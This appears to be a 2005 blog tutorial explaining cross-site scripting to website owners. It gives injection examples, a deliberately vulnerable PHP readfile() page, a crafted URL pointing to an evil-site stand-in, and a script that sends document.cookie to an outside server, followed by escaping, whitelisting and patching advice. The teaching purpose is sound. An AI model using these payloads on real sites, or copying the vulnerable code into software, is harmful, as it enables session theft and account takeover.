The Hungry Hacker's Explanation of Everything

Cross-Site Scripting 101

10 December 2005

Cross-Site Scripting, or XSS for short, is a method of compromising a user’s access to a third-party website in one manner or another. The actual result of the attack, ranging from session theft (you don’t log out, and the evildoer returns to the site using your credentials) to elaborate automated account hijacking, is unimportant for the purposes of this discussion. What’s important is understanding that any small vulnerability (in either the browser or the web service) can be escalated into a full-scale, automated, “change your password and empty your PayPal account” attack, given enough time and dedication from the attacker.

XSS is by no means a new attack, and it has been explained often before. To my knowledge, however, it has not been explained in a way that motivates the average WordPress or phpBB2 user to keep their software up to date.

It’s important to note that while JavaScript is the most commonly used language, it’s not the only one. VBScript, as well as other technologies such as ActiveX, Java and Flash, can all be used for malicious purposes in one way or another.

Your average XSS attack involves three phases: find an attack vector; write a script that exploits that vector; and write a script that achieves the end result. The attack vectors vary widely: any time a malicious user can inject arbitrary JavaScript that is then executed by another visitor’s web browser, the service is vulnerable.

In the simplest form, an example could be a forum where users can specify the URL of an image to be displayed next to or under their name (commonly called an “avatar”). If the forum software doesn’t adequately validate the form input and simply includes whatever is in the box in the HTML output sent to other users, there’s an issue. This situation is common, although most decent forum packages will validate a URL passed to them. But for the sake of argument:

http://some.site.xyz/image.jpeg

becomes, when output:

<img src="http://some.site.xyz/image.jpeg" />

Thus, if we are malicious users:

http://some.site.xyz/image.jpeg" onload="alert('agh!');

becomes, when output:

<img src="http://some.site.xyz/image.jpeg" onload="alert('agh!');" />

When the output page is loaded in a JavaScript-enabled browser, a script alert dialog should appear. While not overly malicious, this simple test (which you will find in most security announcements regarding XSS vulnerabilities) illustrates the fact that unintended JavaScript is running on the website.
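As a rough sketch of what adequate output handling could look like for the avatar case, the snippet below escapes the HTML special characters before the value is placed inside the src attribute. The names escapeHtml and renderAvatar are hypothetical and do not come from any particular forum package. Escaping on its own does not check that the value is a sensible image URL; it only stops the value from breaking out of the attribute.

```javascript
// Hypothetical helper: escape the five characters that are special in HTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;") // must run first so later entities are not double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical renderer for the avatar markup shown above.
function renderAvatar(url) {
  return '<img src="' + escapeHtml(url) + '" />';
}

// The malicious input from the example: it tries to close the src attribute early.
const malicious = "http://some.site.xyz/image.jpeg\" onload=\"alert('agh!');";
console.log(renderAvatar(malicious));
// prints: <img src="http://some.site.xyz/image.jpeg&quot; onload=&quot;alert(&#39;agh!&#39;);" />
```

With the quotes escaped, the browser treats the whole string as one (broken) image URL rather than as a new onload attribute.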

Of course, if a site runs a simple CGI “guestbook” script, an attacker can simply include <script> tags in a guestbook entry if the entries aren’t properly validated.

In another example, some PHP programmers have been known to use the following:

<?php
// Deliberately vulnerable: the 'page' parameter is handed to readfile() unchecked.
if (isset($_GET['page'])) {
    printf("<html><title>My Site</title>\n");
    printf("<body>\n");
    printf("<h1>My Site</h1>\n");
    readfile($_GET['page']);
    printf("</body>\n");
    printf("</html>\n");
}
?>

Now, assuming there is no other validation of $_GET['page'], and the PHP setting “allow_url_fopen” is enabled (which it is, by default), one can pass the URL of a remote page containing malicious JavaScript, and send the resulting URL to a victim:

http://some.site.abc/showpage.php?page=http%3A%2F%2Fsome.evil.site.xyz%2Fpage.html

These two methods differ, because one is permanent and has the potential to net many users, and the other isn’t. The first method is commonly called “script injection”, because the page (or pages) is altered semi-permanently and every visitor receives the script. In the second example, only the crafted URL is dangerous; visiting any other page on the website will not put you at risk of exposure.
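One way to close the hole in the readfile() example is to stop treating the parameter as a path at all, and instead look it up in a fixed list of pages the site is willing to serve. The sketch below shows the idea in JavaScript rather than PHP; the page names, file paths and the resolvePage function are all made up for illustration.

```javascript
// Hypothetical allowlist: request names mapped to local files the site will serve.
const ALLOWED_PAGES = new Map([
  ["home", "pages/home.html"],
  ["about", "pages/about.html"],
]);

// Returns the local file for a requested page name,
// or null when the name is not on the list (including remote URLs).
function resolvePage(requested) {
  return ALLOWED_PAGES.has(requested) ? ALLOWED_PAGES.get(requested) : null;
}

console.log(resolvePage("about"));
console.log(resolvePage("http://some.evil.site.xyz/page.html"));
```

Because the user-supplied value is only ever used as a lookup key, a remote URL simply fails the lookup and nothing is fetched.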

A third example could be via logs and error messages. XSS vulnerabilities are found all the time in web-based software, because anything that is passed from the user’s browser and then echoed back into an HTML page must be validated. In one scenario: if a malicious user can pass an invalid username and password to a website via the GET method, and the invalid username appears on the resulting page without being validated, they can craft an XSS attack inside the bounds of this text and pass the URL on to other users. This scenario depends on a certain level of user ignorance, however, as people shouldn’t click on untrusted login URLs.

In another example, if a user’s access to a website is logged, and the logs are then rendered as HTML, certain fields such as the User Agent must be validated prior to being output. Otherwise, when the site administrator (or anyone else with access to the logs) views the log, their session is at risk.
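Both the error-message case and the log case come down to the same rule: anything that originated in a browser gets escaped on its way into HTML. A minimal sketch for the log viewer follows, assuming a made-up log entry shape of { ip, userAgent } and hypothetical function names.

```javascript
// Map of HTML special characters to their entity equivalents.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical renderer: turns one log entry into a table row,
// escaping every field because all of them are attacker-controllable.
function renderLogRow(entry) {
  return "<tr><td>" + escapeHtml(entry.ip) + "</td><td>" + escapeHtml(entry.userAgent) + "</td></tr>";
}

// A visitor who set their User Agent header to a script tag.
const row = renderLogRow({ ip: "192.0.2.10", userAgent: "<script>alert('agh!');</script>" });
console.log(row);
// prints: <tr><td>192.0.2.10</td><td>&lt;script&gt;alert(&#39;agh!&#39;);&lt;/script&gt;</td></tr>
```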

“I’m confused, why is this an issue?”

The issue is that the potentially malicious script is executed by the browser without the current website’s permission or knowledge. Worse still: it’s more often than not run in the security context of the current website, meaning it has access to cookies, forms and such and can manipulate them.

For a display of the destructive power of XSS when used maliciously, look into the havoc it wreaked on the popular site “myspace.com”, or some other (slightly less destructive) uses.

Which leads us right into our next section: the malicious JavaScript itself. If you’re feeling brave, and maintain your own website that uses cookies in any manner, feel free to append the following to one of your pages:

<script type="text/javascript"> document.location='http://www.hungryhacker.com/downloads/test.cgi?' + document.cookie; </script>

Don’t worry about the fact that you have access to edit your page and an attacker wouldn’t – I aim to prove by the end of this article that preventing XSS is quite difficult. The method used to get the script onto a popular website is irrelevant at this point. As we will discuss later in the mitigation section, the wily black-hat hacker is always coming up with new ways to inject unwanted scripts.

The script above will hopefully redirect the viewing browser to a script on my server, appending the current document’s cookie to the end of the URL. Because it’s for example purposes, all this particular script does is print back the cookie’s contents in plain text. However, it should be painfully obvious that the cookie could just as easily be logged, or used for whatever else the attacker feels like doing with it.

Taking the attack a step further: armed with a session cookie from many popular web applications, an attacker can steal that user’s session, provided the user doesn’t “log out” in the meantime. Mitigating this is tough. I make it a whole lot harder in my webapps by tying a user’s session to his or her IP address, but this breaks support for things like WebTV and some AOL users. Nor does it stop the problem if the malicious user goes crazy with JavaScript and writes an automated script which changes your password and email address from within your own browser. It should be strongly noted that this scenario isn’t far-fetched.
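The IP-binding idea can be sketched roughly as follows. This is not the code from my own webapps, just an illustration with an invented in-memory store and invented function names: the address seen at login is stored with the session, and a later request is only honoured if it arrives from the same address.

```javascript
// Hypothetical in-memory session store: session ID -> { user, ip }.
const sessions = new Map();

// Record the address the user logged in from alongside the session.
function createSession(sessionId, user, ip) {
  sessions.set(sessionId, { user, ip });
}

// Returns the user for a valid session, or null if the ID is unknown
// or the request comes from a different address than the login did.
function lookupSession(sessionId, requestIp) {
  const session = sessions.get(sessionId);
  if (!session || session.ip !== requestIp) return null;
  return session.user;
}

createSession("abc123", "alice", "192.0.2.10");
console.log(lookupSession("abc123", "192.0.2.10"));   // same address as login
console.log(lookupSession("abc123", "198.51.100.7")); // stolen cookie replayed from elsewhere
```

The trade-off is that a legitimate user whose address changes between requests is logged out too.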

Generally speaking, the best idea is to disallow the insertion of arbitrary HTML or scripts into your site. This involves more than simply blacklisting <script> tags: one must be careful of attributes on all manner of tags (such as the <img> tag example above). A far better idea is to whitelist tags and their attributes or, if you are using something such as BBCode (from phpBB2 et al), to carefully validate the URLs which are passed.
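A very conservative take on whitelisting is to escape everything first and then switch back on only a handful of tags in their exact, attribute-free form. The sketch below does that; the tag list and the sanitizeComment name are assumptions chosen for illustration, and a real package would need more care (balanced tags, whitelisted attributes and so on).

```javascript
// Hypothetical whitelist of tags permitted without any attributes.
const ALLOWED_TAGS = ["b", "i", "em", "strong", "code"];

function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function sanitizeComment(input) {
  // Escape everything first, so nothing the user typed is live markup.
  let safe = escapeHtml(input);
  // Then restore only exact opening and closing forms of the allowed tags.
  // A tag carrying any attribute never matches and therefore stays escaped.
  for (const tag of ALLOWED_TAGS) {
    safe = safe
      .replace(new RegExp("&lt;" + tag + "&gt;", "g"), "<" + tag + ">")
      .replace(new RegExp("&lt;/" + tag + "&gt;", "g"), "</" + tag + ">");
  }
  return safe;
}

console.log(sanitizeComment('<b>hi</b> <img src="x" onload="alert(1)">'));
// prints: <b>hi</b> &lt;img src=&quot;x&quot; onload=&quot;alert(1)&quot;&gt;
```

Starting from "everything is escaped" means a tag nobody thought about is harmless by default, which is the opposite of how a blacklist fails.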

For non-HTML input: validate, validate, validate. Any time text is taken from one user and sent to a web browser of any kind, one must ensure it contains no HTML markup or special characters which can cause us grief.

A popular quote from one Jon Postel is often reworded as “Be conservative in what you send, be liberal in what you accept” when it comes to software programming. I much prefer, however, to adapt it to “be liberal in what you expect, be conservative in what you accept”, especially when it comes to user-passed data. I wholeheartedly recommend strong validation on any form of user input.

“But I’m not a developer!” I hear you cry. Since I began writing this article for non-programmer types, I managed to get a little off track, so I’ll attempt to bring us back. If you’re just an end user of some package or another on your website, you aren’t out of the woods yet. Your site can still be vulnerable to XSS and other methods, and part of my motivation in writing this article is that the average WordPress or MovableType user doesn’t take it anywhere near seriously enough. Don’t even get me started on phpBB2 users, either.

The first thing you need to do is find out if the particular packages or scripts you’re using have security announcement lists, and then subscribe to them if they’re available. If not, make it a habit to check the developer’s website for updates and security news at least once a week, and apply updates as they become available. I believe the WordPress package includes security announcements in the administration page.

The next thing you need to do is take these announcements seriously. Generally speaking, for the average low-profile software user it’s not so important that you need to run home early from work just to patch your software. However, leaving it for any more than a week is just bad practice; try to aim for 48 hours.

The bottom line is, XSS and other subversive means aren’t going away. Thanks to some web browsers’ rendering of absolutely mangled HTML, there is an ever-increasing number of ways to sneak script onto dynamic webpages. About all you can do is arm yourself with information, and stay vigilant in your software updates.
